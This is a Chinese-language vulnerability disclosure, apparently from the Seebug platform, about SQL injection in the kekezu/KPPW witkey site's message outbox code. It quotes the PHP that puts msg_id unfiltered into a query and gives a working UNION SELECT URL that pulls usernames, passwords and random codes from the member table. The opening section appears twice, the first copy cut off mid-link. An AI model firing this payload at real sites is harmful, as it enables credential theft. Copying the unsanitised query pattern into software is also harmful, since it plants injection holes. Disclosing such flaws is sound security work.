### 简要描述: 没有过滤,产生注入。 ### 详细说明: 文件路径 /control/user/message_outbox.php ``` switch ($action) { case 'mulitDel' : if (is_array($ckb)) { foreach ( $ckb as $v ) { list ( $intMsgId, $intStatus ) = explode ( ',', $v ); if ($intStatus == 0) { db_factory::execute ( "update " . TABLEPRE . "witkey_msg set msg_status=1 where msg_id = $intMsgId" ); } else { $objMsgT->del ( 'msg_id', $intMsgId ); } } kekezu::show_msg ( '删除成功', $strUrl, NULL, NULL, 'ok' ); } else { kekezu::show_msg ( '删除失败', NULL, NULL, NULL, 'error' ); } break; ``` db_factory::execute ( "update " . TABLEPRE . "witkey_msg set msg_status=1 where msg_id = $intMsgId" ); msg_id 带入查询产生注入。 mysql执行语句为 select * from keke_witkey_msg where msg_id<6 and 1=1 and msg_status<>1 and uid = 5529 order by msg_id desc limit 0,1 构造注入语句 http://127.0.0.1/1/index.php?do=user&view=message&op=detail&msgId=6 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,rand_code),10,11 from keke_witkey_member--&type=outbox&intPage=1 [<img...
### 简要描述: 没有过滤,产生注入。 ### 详细说明: 文件路径 /control/user/message_outbox.php ``` switch ($action) { case 'mulitDel' : if (is_array($ckb)) { foreach ( $ckb as $v ) { list ( $intMsgId, $intStatus ) = explode ( ',', $v ); if ($intStatus == 0) { db_factory::execute ( "update " . TABLEPRE . "witkey_msg set msg_status=1 where msg_id = $intMsgId" ); } else { $objMsgT->del ( 'msg_id', $intMsgId ); } } kekezu::show_msg ( '删除成功', $strUrl, NULL, NULL, 'ok' ); } else { kekezu::show_msg ( '删除失败', NULL, NULL, NULL, 'error' ); } break; ``` db_factory::execute ( "update " . TABLEPRE . "witkey_msg set msg_status=1 where msg_id = $intMsgId" ); msg_id 带入查询产生注入。 mysql执行语句为 select * from keke_witkey_msg where msg_id<6 and 1=1 and msg_status<>1 and uid = 5529 order by msg_id desc limit 0,1 构造注入语句 http://127.0.0.1/1/index.php?do=user&view=message&op=detail&msgId=6 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,rand_code),10,11 from keke_witkey_member--&type=outbox&intPage=1 [<img src="https://images.seebug.org/upload/201406/26113156d2a3cd1f6c6fac367dbc85aa36e3de1c.jpg" alt="12222.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/26113156d2a3cd1f6c6fac367dbc85aa36e3de1c.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201406/26113156d2a3cd1f6c6fac367dbc85aa36e3de1c.jpg" alt="12222.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/26113156d2a3cd1f6c6fac367dbc85aa36e3de1c.jpg)
